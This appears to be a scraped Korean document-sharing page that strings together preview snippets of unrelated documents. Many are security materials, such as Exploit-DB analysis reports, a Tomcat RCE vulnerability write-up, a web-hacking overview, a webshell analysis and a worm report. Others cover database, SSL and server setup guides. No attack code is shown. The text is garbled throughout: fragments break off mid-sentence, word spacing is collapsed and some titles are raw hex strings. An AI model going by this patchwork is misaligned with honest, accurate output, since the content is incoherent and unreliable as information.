표준 시험인증 기술 동향 FIDO(Fast IDentity Online) 생체 인증 기술 표준화 동향 이동기 TTA 모바일응용서비스 프로젝트그룹(PG910) 의장 SK텔레콤 NIC 담당 매니저 76 l 2015 01/02 PASSWORDLESS EXPERIENCE (UAF standards) ONLINE AUTH REQUEST LOCAL DEVICE AUTH
More informationEDB 분석보고서 (04.06) ~ Exploit-DB(http://exploit-db.com) 에공개된별로분류한정보입니다. Directory Traversal users-x.php 4.0 -support-x.php 4.0 time-
EDB 분석보고서 (04.06) 04.06.0~04.06.0 Exploit-DB(http://exploit-db.com) 에공개된별로분류한정보입니다. 분석내용정리 ( 작성 : 펜타시큐리티시스템보안성평가팀 ) 04년 06월에공개된 Exploit-DB의분석결과, SQL 공격에대한보고개수가가장많았습니다. 이와같은결과로부터여전히 SQL 이웹에서가장많이사용되는임을확인할수있습니다.
More informationJ2EE & Web Services iSeminar
9iAS :, 2002 8 21 OC4J Oracle J2EE (ECperf) JDeveloper : OLTP : Oracle : SMS (Short Message Service) Collaboration Suite Platform Email Developer Suite Portal Java BI XML Forms Reports Collaboration Suite
More informationResearch & Technique Apache Tomcat RCE 취약점 (CVE ) 취약점개요 지난 4월 15일전세계적으로가장많이사용되는웹애플리케이션서버인 Apache Tomcat에서 RCE 취약점이공개되었다. CVE 취약점은 W
Research & Technique Apache Tomcat RCE 취약점 (CVE-2019-0232) 취약점개요 지난 4월 15일전세계적으로가장많이사용되는웹애플리케이션서버인 Apache Tomcat에서 RCE 취약점이공개되었다. CVE-2019-0232 취약점은 Windows 시스템의 Apache Tomcat 서버에서 enablecmdlinearguments
More informationWindows 8에서 BioStar 1 설치하기
/ 콘텐츠 테이블... PC에 BioStar 1 설치 방법... Microsoft SQL Server 2012 Express 설치하기... Running SQL 2012 Express Studio... DBSetup.exe 설정하기... BioStar 서버와 클라이언트 시작하기... 1 1 2 2 6 7 1/11 BioStar 1, Windows 8 BioStar
More informationWEB Hacking 한국디지털미디어고등학교, T eampur e, JT JSOFT 장태 진
WEB Hacking 한국디지털미디어고등학교, T eampur e, JT JSOFT 장태 진 해킹의 종류 웹해킹 네트워크 해킹 시스템(OS)해킹 웹해킹 기법 SQL INJECTION HTML INJECTION Cross Site Scripting HEADER INJECTION 웹해킹 기법 업로드 취약점 다운로드 취약점 INJECTION 나는 사람입니다. 나는
More information<C0CCBCBCBFB52DC1A4B4EBBFF82DBCAEBBE7B3EDB9AE2D313939392D382E687770>
i ii iii iv v vi 1 2 3 4 가상대학 시스템의 국내외 현황 조사 가상대학 플랫폼 개발 이상적인 가상대학시스템의 미래상 제안 5 웹-기반 가상대학 시스템 전통적인 교수 방법 시간/공간 제약을 극복한 학습동기 부여 교수의 일방적인 내용전달 교수와 학생간의 상호작용 동료 학생들 간의 상호작용 가상대학 운영 공지사항,강의록 자료실, 메모 질의응답,
More information< F33BFF920C0CEC5CDB3DD20C4A7C7D8BBE7B0ED20B5BFC7E220B9D720BAD0BCAEBFF9BAB828C3D6C1BEBABB292E687770>
악성코드유포지 경유지의공격코드와보안취약점 1. 개요 본고에서는인터넷침해사고대응지원센터에서자체개발 적용하고있는악성코드은닉사이트탐지프로그램에서 2006년 1월부터 3월까지탐지한사이트중 50개를대상으로공격코드및관련소프트웨어취약점을분석한다. 먼저 ( 그림 1) 에서악성코드유포와경유지를구분하고, 2005년이후게재되었던 인터넷침해사고동향및분석월보 관련기사를해당부분에적어보았다.
More informationBusiness Agility () Dynamic ebusiness, RTE (Real-Time Enterprise) IT Web Services c c WE-SDS (Web Services Enabled SDS) SDS SDS Service-riented Architecture Web Services ( ) ( ) ( ) / c IT / Service- Service-
More information2006_8_14 (8_17 updated) ms06-040 ¿ú(wgareg.exe) ºÐ¼® º¸°í¼�.hwp
MS06-040 웜(wgareg.exe) 분석 1. 개요 2. 전파 방법 (그림) browser를 오픈 요청 (그림) srvsvc 에 대한 요청 (그림) Exploit 과정 (그림) 웜 전송 3. 감염 시 악성 기능 (그림) 감염 시 개인방화벽 OFF 예 4. 타 시스템 감염을 위한 공격력 5. 위험 요소 6. 사전 예방 방법 7. 감염 시 치료 방법
More information<5BB5BFB8EDB4EB2D E4B5D C0A5BDA9C0C720BAD0BCAEB0FA20B4EBC0C020B9E6BEC82E687770>
기술문서 08. 10. 25. 작성 PHP 기반웹쉘의동작원리와공개웹쉘의기능분석및대응방안 작성자 : 동명대학교 THINK 정정홍 (zeratul621@naver.com) 1. 시작하면서 p. 2 2. 웹쉘의동작원리 p. 3 3. r57shell p. 5 4. kcwebtelnet p. 9 5. phpremoteview p. 10 6. 웹쉘대응방안 p. 12 동명대학교정보보호동아리
More informationWebKnight를 활용한 IIS 웹서버 보안
NTFAQ Korea (http://www.ntfaq.co.kr) 이종량 (jrlee@ntfaq.co.kr) 1. WebKnight에대해서 WebKnight의정의 WebKnight의필요성 2. WebKnight의설치 3. 파일의구성 4. WebKnight의설정 5. 필터링 (SQL Injection Keyword) 6. 로그 WebKnight의로그 WebKnight의로그분석
More informationPortal_9iAS.ppt [읽기 전용]
Application Server iplatform Oracle9 A P P L I C A T I O N S E R V E R i Oracle9i Application Server e-business Portal Client Database Server e-business Portals B2C, B2B, B2E, WebsiteX B2Me GUI ID B2C
More informationDBMS & SQL Server Installation Database Laboratory
DBMS & 조교 _ 최윤영 } 데이터베이스연구실 (1314 호 ) } 문의사항은 cyy@hallym.ac.kr } 과제제출은 dbcyy1@gmail.com } 수업공지사항및자료는모두홈페이지에서확인 } dblab.hallym.ac.kr } 홈페이지 ID: 학번 } 홈페이지 PW:s123 2 차례 } } 설치전점검사항 } 설치단계별설명 3 Hallym Univ.
More information네트워크 안정성을 지켜줄 최고의 기술과 성능 TrusGuard는 국내 최초의 통합보안솔루션으로서 지난 5년간 약 4천여 고객 사이트에 구축 운영되면서 기술의 안정성과 성능면에서 철저한 시장 검증을 거쳤습니다. 또한 TrusGuard는 단독 기능 또는 복합 기능 구동 시
네트워크 보안도 안철수연구소입니다 통합 보안의 No.1 파트너, AhnLab TrusGuard 네트워크 환경을 수호하는 최고의 통합 보안 시스템 고성능 방화벽ㆍVPN Security 기술과 고품질 Integrated Security 기술의 강력한 결합 네트워크 안정성을 지켜줄 최고의 기술과 성능 TrusGuard는 국내 최초의 통합보안솔루션으로서 지난 5년간
More information[Brochure] KOR_TunA
LG CNS LG CNS APM (TunA) LG CNS APM (TunA) 어플리케이션의 성능 개선을 위한 직관적이고 심플한 APM 솔루션 APM 이란? Application Performance Management 란? 사용자 관점 그리고 비즈니스 관점에서 실제 서비스되고 있는 어플리케이션의 성능 관리 체계입니다. 이를 위해서는 신속한 장애 지점 파악 /
More informationXSS Attack - Real-World XSS Attacks, Chaining XSS and Other Attacks, Payloads for XSS Attacks
XSS s XSS, s, May 25, 2010 XSS s 1 2 s 3 XSS s MySpace 사건. Samy (JS.Spacehero) 프로필 페이지에 자바스크립트 삽입. 스크립트 동작방식 방문자를 친구로 추가. 방문자의 프로필에 자바스크립트를 복사. 1시간 만에 백만 명이 친구등록. s XSS s 위험도가 낮은 xss 취약점을 다른 취약점과 연계하여
More information<4D F736F F F696E74202D20B5A5C0CCC5CDBAA3C0CCBDBA5F3130C1D6C2F75F31C2F7BDC32E >
Chapter 8 데이터베이스응용개발 목차 사용자인터페이스와도구들 웹인터페이스와데이터베이스 웹기초 Servlet 과 JSP 대규모웹응용개발 ASP.Net 8 장. 데이터베이스응용개발 (Page 1) 1. 사용자인터페이스와도구들 대부분의데이터베이스사용자들은 SQL을사용하지않음 응용프로그램 : 사용자와데이터베이스를연결 데이터베이스응용의구조 Front-end Middle
More information1. Windows 설치 (Client 설치 ) 원하는위치에다운받은발송클라이언트압축파일을해제합니다. Step 2. /conf/config.xml 파일수정 conf 폴더에서 config.xml 파일을텍스트에디터를이용하여 Open 합니다. config.xml 파일에서, 아
LG U+ SMS/MMS 통합클라이언트 LG U+ SMS/MMS Client Simple Install Manual LG U+ SMS/MMS 통합클라이언트 - 1 - 간단설치매뉴얼 1. Windows 설치 (Client 설치 ) 원하는위치에다운받은발송클라이언트압축파일을해제합니다. Step 2. /conf/config.xml 파일수정 conf 폴더에서 config.xml
More informationEclipse 와 Firefox 를이용한 Javascript 개발 발표자 : 문경대 11 년 10 월 26 일수요일
Eclipse 와 Firefox 를이용한 Javascript 개발 발표자 : 문경대 Introduce Me!!! Job Jeju National University Student Ubuntu Korean Jeju Community Owner E-Mail: ned3y2k@hanmail.net Blog: http://ned3y2k.wo.tc Facebook: http://www.facebook.com/gyeongdae
More information게시판 스팸 실시간 차단 시스템
오픈 API 2014. 11-1 - 목 차 1. 스팸지수측정요청프로토콜 3 1.1 스팸지수측정요청프로토콜개요 3 1.2 스팸지수측정요청방법 3 2. 게시판스팸차단도구오픈 API 활용 5 2.1 PHP 5 2.1.1 차단도구오픈 API 적용방법 5 2.1.2 차단도구오픈 API 스팸지수측정요청 5 2.1.3 차단도구오픈 API 스팸지수측정결과값 5 2.2 JSP
More informationInterstage5 SOAP서비스 설정 가이드
Interstage 5 Application Server ( Solaris ) SOAP Service Internet Sample Test SOAP Server Application SOAP Client Application CORBA/SOAP Server Gateway CORBA/SOAP Gateway Client INTERSTAGE SOAP Service
More information본문서는 초급자들을 대상으로 최대한 쉽게 작성하였습니다. 본문서에서는 설치방법만 기술했으며 자세한 설정방법은 검색을 통하시기 바랍니다. 1. 설치개요 워드프레스는 블로그 형태의 홈페이지를 빠르게 만들수 있게 해 주는 프로그램입니다. 다양한 기능을 하는 플러그인과 디자인
스마일서브 CLOUD_Virtual 워드프레스 설치 (WORDPRESS INSTALL) 스마일서브 가상화사업본부 Update. 2012. 09. 04. 본문서는 초급자들을 대상으로 최대한 쉽게 작성하였습니다. 본문서에서는 설치방법만 기술했으며 자세한 설정방법은 검색을 통하시기 바랍니다. 1. 설치개요 워드프레스는 블로그 형태의 홈페이지를 빠르게 만들수 있게
More information초보자를 위한 ASP.NET 2.0
(World Wide Web), HTML., (ebay) (Amazon.com) HTML,., Microsoft ASP.NET. ASP.NET ASP.NET., ASP.NET HTML,,. ASP.NET HTML.. ASP.NET, Microsoft Visual Basic. Visual Basic. 5 Visual Basic, Visual Basic. ASP.NET
More informationuntitled
A Leader of Enterprise e-business Solution FORCS Co., LTD 1 OZ Application Getting Started (ver 5.1) 2 FORCS Co., LTD A Leader of Enterprise e-business Solution FORCS Co., LTD 3 OZ Application Getting
More information인터넷 비즈니스의 필수 요소, 트랜잭션 시큐리티 서비스 인터넷 비즈니스는 기업 영리 활동에 있어서 부가적인 서비스가 아닌 사업을 영위해 가는데 중요한 역할을 하고 있습니다. 특히, 인터넷 쇼핑몰, 인터 넷 뱅킹, 사이버 트레이딩, 전자정부서비스, 온라인 게임, 인터넷
인터넷비즈니스의안심코드, AhnLab Online Security 2.0 멀티브라우저지원! 블루투스키보드지원! 메모리해킹방어! 웹페이지변조및스크린캡처차단! 정보유출걱정없이비즈니스가완성됩니다 보안전용브라우저 AOS Secure Browser 키보드보안서비스 AOS anti-keylogger 온라인 PC 방화벽 AOS firewall 온라인통합방역서비스 AOS
More informationPowerPoint Presentation
Zeroday-worm ( 침해사고유형및발전 ) 2005.3 보안서비스사업본부전상훈과장 ( 바다란 ). 중앙관제센터 / MAIN CERT 인포섹 winsnort@skinfosec.co.kr OR p4ssion@gmail.com 목차 개요 공격유형의변화 Why Zeroday-worm? Web Hacking 유형-ex 결론및대안 개요 1. 침해사고환경의급변 2.
More information1) 인증서만들기 ssl]# cat >www.ucert.co.kr.pem // 설명 : 발급받은인증서 / 개인키파일을한파일로저장합니다. ( 저장방법 : cat [ 개인키
Lighttpd ( 멀티도메인 ) SSL 인증서신규설치가이드. [ 고객센터 ] 한국기업보안. 유서트기술팀 1) 인증서만들기 [root@localhost ssl]# cat www.ucert.co.kr.key www.ucert.co.kr.crt >www.ucert.co.kr.pem // 설명 : 발급받은인증서 / 개인키파일을한파일로저장합니다. ( 저장방법 : cat
More information국외출장복명서 - OWASP & WASC AppSec 2007 참석 IT 기반보호단 / IT 기반기획팀
국외출장복명서 - OWASP & WASC AppSec 2007 참석 - 2007. 11 IT 기반보호단 / IT 기반기획팀 목 차 1. 출장목적 2. 출장자 3. 출장기간및장소 4. 세부일정 5. 활동내용 6. 출장소감및업무활용계획 7. 수집자료 1. 출장목적 o OWASP & WASC AppSec 2007 는웹어플리케이션보안을다루는국제행사로서세계각지에서최고의전문가가참석하여기존홈페이지보안에대한분석결과및최신홈페이지보호기술관련동향에대해발표하고토론하는대규모국제행사임
More informationuFOCS
1 기 : 기 UF_D_V250_002 기 기 기 품 ufocs 기 v2.5.0 히기기기기기기기기기 기 Manual 기 version 기 3.2 기품 2011.7.29 히기 345-13 1 Tel : 02-857-3051 Fax : 02-3142-0319 : http://www.satu.co.kr 2010 SAT information Co., Ltd. All
More information*2008년1월호진짜
3. USB 이동식저장장치를이용하여전파되는악성코드분석 1. 개 요 최근 USB 이동식 저장장치를 통하여 전파되는 악성코드에 대한 감염피해가 증가하고 있어 주의가 필요하다. 이번에 확인된 ntion.exe 악성코드는 감염 시, 특정 사이트에 접속하여 추가 악성코드를 다운로드하는 Dropper 기능을 수행한다. 또한, 웹 서버가 감염될 경우는 웹 서버내의 웹 페이지가
More information구축환경 OS : Windows 7 그외 OS 의경우교재 p26-40 참조 Windows 의다른버전은조금다르게나타날수있음 Browser : Google Chrome 다른브라우저를사용해도별차이없으나추후수업의모든과정은크롬사용 한
수업환경구축 웹데이터베이스구축및실습 구축환경 OS : Windows 7 그외 OS 의경우교재 p26-40 참조 Windows 의다른버전은조금다르게나타날수있음 Browser : Google Chrome 다른브라우저를사용해도별차이없으나추후수업의모든과정은크롬사용 http://chrome.google.com 한림대학교웹데이터베이스 - 이윤환 APM 설치 : AUTOSET6
More information5th-KOR-SANGFOR NGAF(CC)
NGAF Firewall Platform 새로운 세상, 새로운 IT, 새로운 보안 SANGFOR 보안 개념 SAN GFO NGF W+ R NG AF WAF WAF 2010년대 IT산업이 급속하게 발전함에 따라 모든 애플리케이션과 서비스, 그리고 기기들은 BYOD, 사물인터넷(IoT), 클라우드 등과 같은 새로운 기술로 인터넷을 통해 연결되고 있습니다. 이는
More information0. 들어가기 전
컴퓨터네트워크 14 장. 웹 (WWW) (3) - HTTP 1 이번시간의학습목표 HTTP 의요청 / 응답메시지의구조와동작원리이해 2 요청과응답 (1) HTTP (HyperText Transfer Protocol) 웹브라우저는 URL 을이용원하는자원표현 HTTP 메소드 (method) 를이용하여데이터를요청 (GET) 하거나, 회신 (POST) 요청과응답 요청
More information취약점분석보고서 Simple Web Server 2.2 rc2 Remote Buffer Overflow Exploit RedAlert Team 안상환
취약점분석보고서 Simple Web Server 2.2 rc2 Remote Buffer Overflow Exploit 2012-07-19 RedAlert Team 안상환 목 차 1. 개요... 1 1.1. 취약점분석추진배경... 1 2. Simple Web Server 취약점... 2 2.1. Simple Web Server 취약점개요... 2 2.2. Simple
More informationbn2019_2
arp -a Packet Logging/Editing Decode Buffer Capture Driver Logging: permanent storage of packets for offline analysis Decode: packets must be decoded to human readable form. Buffer: packets must temporarily
More information2009년 상반기 사업계획
웹 (WWW) 쉽게배우는데이터통신과컴퓨터네트워크 학습목표 웹서비스를위한클라이언트 - 서버구조를살펴본다. 웹서비스를지원하는 APM(Apache, PHP, MySQL) 의연동방식을이해한다. HTML 이지원하는기본태그명령어와프레임구조를이해한다. HTTP 의요청 / 응답메시지의구조와동작원리를이해한다. CGI 의원리를이해하고 FORM 태그로사용자입력을처리하는방식을알아본다.
More informationPowerPoint 프레젠테이션
Reasons for Poor Performance Programs 60% Design 20% System 2.5% Database 17.5% Source: ORACLE Performance Tuning 1 SMS TOOL DBA Monitoring TOOL Administration TOOL Performance Insight Backup SQL TUNING
More information이도경, 최덕재 Dokyeong Lee, Deokjai Choi 1. 서론
이도경, 최덕재 Dokyeong Lee, Deokjai Choi 1. 서론 2. 관련연구 2.1 MQTT 프로토콜 Fig. 1. Topic-based Publish/Subscribe Communication Model. Table 1. Delivery and Guarantee by MQTT QoS Level 2.1 MQTT-SN 프로토콜 Fig. 2. MQTT-SN
More informationBEA_WebLogic.hwp
BEA WebLogic Server SSL 설정방법 - Ver 1.0-2008. 6 개정이력 버전개정일개정내용 Ver 1.0 2008 년 6 월 BEA WebLogic Server SSL 설명서최초작성 본문서는정보통신부 한국정보보호진흥원의 보안서버구축가이드 를참고하여작성되었습니다. 본문서내용의무단도용및사용을금합니다. < 목차 > 1. 개인키및 CSR 생성방법
More informationMicrosoft Word - CrossSiteScripting[XSS].docx
1 Education Giehong.E goodbyestar@nate.com abstract - 영리를목적으로한곳에서의불법적인배포는금지합니다. - 문서의내용은임의의가상테스트를대상으로한 OWASP10 의기본적인내용들이며교육을위해만들어진문서입니다. - 비인가받은악의적인행동은불법이며법적책임또한당사자에게있습니다 Copyright@2008 All Rights Reserved
More informationFileMaker 15 WebDirect 설명서
FileMaker 15 WebDirect 2013-2016 FileMaker, Inc.. FileMaker, Inc. 5201 Patrick Henry Drive Santa Clara, California 95054 FileMaker FileMaker Go FileMaker, Inc.. FileMaker WebDirect FileMaker, Inc... FileMaker.
More information<3035313230325FBBE7B0EDB3EBC6AE5FB5F0C6FAC6AEC6D0BDBABFF6B5E5C3EBBEE0C1A128BCF6C1A4292E687770>
네트워크 장비의 디폴트 로그인 패스워드 취약점 및 대책 2005. 11. 30 본 보고서의 전부나 일부를 인용시 반드시 [자료: 한국정보보호진흥원(KISA)]룰 명시하여 주시기 바랍니다. - 1 - 1. 개요 패스워드 관리는 보안의 가장 기본적인 사항으로 유추하기 어려운 패스워드를 사용하고, 주기적 으로 패스워드를 변경하는 등 패스워드 관리에 신경을 많이 쓰고
More informationMicrosoft Word - ntasFrameBuilderInstallGuide2.5.doc
NTAS and FRAME BUILDER Install Guide NTAS and FRAME BUILDER Version 2.5 Copyright 2003 Ari System, Inc. All Rights reserved. NTAS and FRAME BUILDER are trademarks or registered trademarks of Ari System,
More informationThe Pocket Guide to TCP/IP Sockets: C Version
인터넷프로토콜 5 장 데이터송수신 (3) 1 파일전송메시지구성예제 ( 고정크기메시지 ) 전송방식 : 고정크기 ( 바이너리전송 ) 필요한전송정보 파일이름 ( 최대 255 자 => 255byte 의메모리공간필요 ) 파일크기 (4byte 의경우최대 4GB 크기의파일처리가능 ) 파일내용 ( 가변길이, 0~4GB 크기 ) 메시지구성 FileName (255bytes)
More information1) 인증서만들기 ssl]# cat >www.ucert.co.kr.pem // 설명 : 발급받은인증서 / 개인키파일을한파일로저장합니다. ( 저장방법 : cat [ 개인키
Lighttpd ( 단일도메인 ) SSL 인증서신규설치가이드. [ 고객센터 ] 한국기업보안. 유서트기술팀 1) 인증서만들기 [root@localhost ssl]# cat www.ucert.co.kr.key www.ucert.co.kr.crt >www.ucert.co.kr.pem // 설명 : 발급받은인증서 / 개인키파일을한파일로저장합니다. ( 저장방법 : cat
More information#WI DNS DDoS 공격악성코드분석
#WI-13-025 2013-07-19 내용요약 이보고서는 7 월 15 일 Fortinet 의 Kyle Yang 이작성한 6.25 DNS DDoS Attack In Korea 를참고하여작성된것임 공격대상이된 DNS 서버는 ns.gcc.go.kr 과 ns2.gcc.go.kr 로, 악성코드에 감염된좀비 PC 는 DNS 서버에대한도메인확인질의에대한응답을두 타깃으로보내지도록하는방법을이용하였음
More informationMySQL-.. 1
MySQL- 기초 1 Jinseog Kim Dongguk University jinseog.kim@gmail.com 2017-08-25 Jinseog Kim Dongguk University jinseog.kim@gmail.com MySQL-기초 1 2017-08-25 1 / 18 SQL의 기초 SQL은 아래의 용도로 구성됨 데이터정의 언어(Data definition
More information< FBFF9B0A320BEC7BCBAC4DAB5E520C0BAB4D0BBE7C0CCC6AE20C5BDC1F620B5BFC7E220BAB8B0EDBCAD283131BFF E302028C8A8C6E4C0CCC1F620BEF7B
월간악성코드은닉사이트탐지 동향보고서 (11 월 ) 2012. 12. 침해사고대응단 인터넷침해대응센터 < 목차 > 1. 악성코드은닉동향요약 1 2. 홈페이지은닉형악성코드통계 2 - 유포지탐지 국가별현황 2 - 대량경유지가탐지된유포지 TOP10 3 - 악성코드유형별비율 4 - 악성코드취약점유형별비율 4 - 악성코드수집및분석결과 5 - 경유지탐지 업종별비율 10
More informationPowerPoint Presentation
오에스아이소프트코리아세미나세미나 2012 Copyright Copyright 2012 OSIsoft, 2012 OSIsoft, LLC. LLC. PI Coresight and Mobility Presented by Daniel Kim REGIONAL 세미나 SEMINAR 세미나 2012 2012 2 Copyright Copyright 2012 OSIsoft,
More information최종_백서 표지
정보보호 활동 제 제 제 제 제 제 장 장 장 장 장 장 인터넷 침해사고 대응 및 예방 활동 정보통신서비스 제공자 등의 정보보호 주요정보통신기반시설 보호 활동 전자정부 정보보호 활동 개인정보보호 활동 대국민 정보보호 활동 제 장 웹서버 파괴 및 대북 보수단체 홈페이지 14개의 자료가 삭제되는 등의 큰 피해로 이어졌다. 한편 6월 25일부터 정부기관, 언론사,
More informationEDB 분석보고서 (04.03) ~ Exploit-DB(http://exploit-db.com) 에공개된별로분류한정보입니다. ** 5개이상발생한주요소프트웨어별상세 EDB 번호 종류 공격난이도 공격위험도 이름 소프트웨어이름 3037 SQL Inj
EDB 분석보고서 (04.03) 04.03.0~04.03.3 Exploit-DB(http://exploit-db.com) 에공개된별로분류한정보입니다. 분석내용정리 ( 작성 : 펜타시큐리티시스템보안성평가팀 ) 04년 03월에공개된 Exploit-DB의분석결과, 해커들이가장많이시도하는공격으로알려져있는 SQL Injection 공격에대한보고개수가가장많았습니다. 무엇보다주의가필요한부분은
More informationuntitled
A Leader of Enterprise e-business Solution FORCS Co., LTD 1 OZ Application Getting Started 2 FORCS Co., LTD A Leader of Enterprise e-business Solution FORCS Co., LTD 3 OZ Application Getting Started 'OZ
More informationPowerPoint Presentation
WordPress 를이용한웹사이트만들기 2015 년 한지웅 WordPress 를이용한웹사이트만들기 Day 1 Day 2 Day 3 Day 4 Day 5 1. 웹사이트제작기초 HTLM 기본 CSS 기본 WordPress 개론 ( 웹사이트구축툴 ) 2. 웹호스팅 / 웹사이트구축 웹호스팅업체선택 cpanel 설정 WordPress 설치 3. WordPress 기초활용
More informationNo Slide Title
J2EE J2EE(Java 2 Enterprise Edition) (Web Services) :,, SOAP: Simple Object Access Protocol WSDL: Web Service Description Language UDDI: Universal Discovery, Description & Integration 4. (XML Protocol
More informationModel Investor MANDO Portal Site People Customer BIS Supplier C R M PLM ERP MES HRIS S C M KMS Web -Based
e- Business Web Site 2002. 04.26 Model Investor MANDO Portal Site People Customer BIS Supplier C R M PLM ERP MES HRIS S C M KMS Web -Based Approach High E-Business Functionality Web Web --based based KMS/BIS
More information문서 템플릿
HDSI 툴분석 [sql injection 기술명세서 ] Sql injection 기술명세서 Ver. 0.01 이문서는 sql injection 기술명세가범위입니다. Copyrights Copyright 2009 by CanvasTeam@SpeeDroot( 장경칩 ) All Rights Reserved. 장경칩의사전승인없이본내용의전부또는일부에대한복사, 전재,
More informationMicrosoft Word - src.doc
IPTV 서비스탐색및콘텐츠가이드 RI 시스템운용매뉴얼 목차 1. 서버설정방법... 5 1.1. 서비스탐색서버설정... 5 1.2. 컨텐츠가이드서버설정... 6 2. 서버운용방법... 7 2.1. 서비스탐색서버운용... 7 2.1.1. 서비스가이드서버실행... 7 2.1.2. 서비스가이드정보확인... 8 2.1.3. 서비스가이드정보추가... 9 2.1.4. 서비스가이드정보삭제...
More information10.ppt
: SQL. SQL Plus. JDBC. SQL >> SQL create table : CREATE TABLE ( ( ), ( ),.. ) SQL >> SQL create table : id username dept birth email id username dept birth email CREATE TABLE member ( id NUMBER NOT NULL
More informationNetwork seminar.key
Intro to Network .. 2 4 ( ) ( ). ?!? ~! This is ~ ( ) /,,,???? TCP/IP Application Layer Transfer Layer Internet Layer Data Link Layer Physical Layer OSI 7 TCP/IP Application Layer Transfer Layer 3 4 Network
More informationMicrosoft PowerPoint - 10Àå.ppt
10 장. DB 서버구축및운영 DBMS 의개념과용어를익힌다. 간단한 SQL 문법을학습한다. MySQL 서버를설치 / 운영한다. 관련용어 데이터 : 자료 테이블 : 데이터를표형식으로표현 레코드 : 테이블의행 필드또는컬럼 : 테이블의열 필드명 : 각필드의이름 데이터타입 : 각필드에입력할값의형식 학번이름주소연락처 관련용어 DB : 테이블의집합 DBMS : DB 들을관리하는소프트웨어
More informationChap7.PDF
Chapter 7 The SUN Intranet Data Warehouse: Architecture and Tools All rights reserved 1 Intranet Data Warehouse : Distributed Networking Computing Peer-to-peer Peer-to-peer:,. C/S Microsoft ActiveX DCOM(Distributed
More informationPowerPoint 프레젠테이션
Web Browser Web Server ( ) MS Explorer 5.0 WEB Server MS-SQL HTML Image Multimedia IIS Application Web Server ASP ASP platform Admin Web Based ASP Platform Manager Any Platform ASP : Application Service
More informationuntitled
보안서버구축가이드 8 Ⅲ. SSL 방식보안서버구축하기 1. 소개및보안서버구축절차 가. 개요 SSL은 Secure Sockets Layer의머리글이며, 1994년 Netscape에의해전세계적인표준보안기술이개발되었습니다. SSL 방식은웹브라우저와서버간의통신에서정보를암호화함으로써도중에해킹을통해정보가유출되더라도정보의내용을보호할수있는기능을갖춘보안솔루션으로전세계적으로수백만개의웹사이트에서사용하고있습니다.
More informationORANGE FOR ORACLE V4.0 INSTALLATION GUIDE (Online Upgrade) ORANGE CONFIGURATION ADMIN O
Orange for ORACLE V4.0 Installation Guide ORANGE FOR ORACLE V4.0 INSTALLATION GUIDE...1 1....2 1.1...2 1.2...2 1.2.1...2 1.2.2 (Online Upgrade)...11 1.3 ORANGE CONFIGURATION ADMIN...12 1.3.1 Orange Configuration
More information메일서버등록제(SPF) 인증기능적용안내서 (HP-UX - qmail) OS Mail Server SPF 적용모듈 (Perl 기반) 작성기준 HP-UX 11.11i qmail 1.03 spf-filter 년 6 월
메일서버등록제(SPF) 인증기능적용안내서 (HP-UX - qmail) OS Mail Server SPF 적용모듈 (Perl 기반) 작성기준 HP-UX 11.11i qmail 1.03 spf-filter 1.0 2016 년 6 월 목 차 I. 개요 1 1. SPF( 메일서버등록제) 란? 1 2. SPF 를이용한이메일인증절차 1 II. qmail, SPF 인증모듈설치
More informationMySQL-Ch05
MySQL P A R T 2 Chapter 05 Chapter 06 Chapter 07 Chapter 08 05 Chapter MySQL MySQL. (, C, Perl, PHP),. 5.1 MySQL., mysqldump, mysqlimport, mysqladmin, mysql. MySQL. mysql,. SQL. MySQL... MySQL ( ). MySQL,.
More information<BBE7B0EDB3EBC6AE5FC7E3BAEAB0D4C0D32E687770>
웹하드서비스를통해생성된 Botnet 을이용한 DDoS 공격피해사례 2009. 12. 본보고서의전부나일부를인용시반드시 [ 자료 : 한국인터넷침해대응센터 (KrCERT)] 를명시하여주시기바랍니다. - 1 - 1. 개요 최근발생하고있는 DDoS 사례들을분석해보면그방식들이점점지능화되고조직화되고있다는것을확인할수있다. 또한 DDoS 공격의목적도과거자기과시또는정치적인이유의단순한목적에서벗어나금전적이득을취하거나경쟁업체의영업을방해하기위한목적으로점차기업화되고있기도하다.
More informationEDB 분석보고서 (0.0) 0.0.0~0.0. Exploit-DB( 에공개된별로분류한정보입니다. 날짜 EDB 번호분류공격난이도공격위험도이름핵심공격코드대상프로그램대상환경 SQL Injection 중상 Absolu
EDB 분석보고서 (0.0) 0.0.0~0.0. Exploit-DB(http://exploit-db.com) 에공개된별로분류한정보입니다. 분석내용정리 ( 작성 : 펜타시큐리티시스템보안성평가팀 ) 0 년 월에공개된 Exploit-DB 의분석결과, 잘알려진웹공격인 SQL Injection 과 XSS(Cross Site Scripting) 공격에대한보고가가장많았습니다.
More informationPowerPoint 프레젠테이션
Web server porting 2 Jo, Heeseung Web 을이용한 LED 제어 Web 을이용한 LED 제어프로그램 web 에서데이터를전송받아타겟보드의 LED 를조작하는프로그램을작성하기위해다음과같은소스파일을생성 2 Web 을이용한 LED 제어 LED 제어프로그램작성 8bitled.html 파일을작성 root@ubuntu:/working/web# vi
More informationPCServerMgmt7
Web Windows NT/2000 Server DP&NM Lab 1 Contents 2 Windows NT Service Provider Management Application Web UI 3 . PC,, Client/Server Network 4 (1),,, PC Mainframe PC Backbone Server TCP/IP DCS PLC Network
More informationuntitled
A Leader of Enterprise e-business Solution FORCS Co., LTD 1 OZ Application Designer Getting Started 2 FORCS Co., LTD A Leader of Enterprise e-business Solution FORCS Co., LTD 3 OZ Application Designer
More informationuntitled
A Leader of Enterprise e-business Solution FORCS Co., LTD 1 OZ Application Designer Getting Started 2 FORCS Co., LTD A Leader of Enterprise e-business Solution FORCS Co., LTD 3 OZ Application Designer
More information쉽게 풀어쓴 C 프로그래밊
Power Java 제 27 장데이터베이스 프로그래밍 이번장에서학습할내용 자바와데이터베이스 데이터베이스의기초 SQL JDBC 를이용한프로그래밍 변경가능한결과집합 자바를통하여데이터베이스를사용하는방법을학습합니다. 자바와데이터베이스 JDBC(Java Database Connectivity) 는자바 API 의하나로서데이터베이스에연결하여서데이터베이스안의데이터에대하여검색하고데이터를변경할수있게한다.
More informationìœ€íŁ´IP( _0219).xlsx
차단 IP 국적 공격유형 목적지포트 IPS 룰 180.97.215.45 중국 서비스취약점공격 TCP/5555 (0001)SYN Port Scan 222.186.42.248 중국 서비스취약점공격 TCP/80 (0001)SYN Port Scan 104.236.178.166 미국 웹해킹 TCP/80 (5010)HEAD / HTTP (Http server buffer
More information웹서버보안취약점대응및조치 교육사이버안전센터
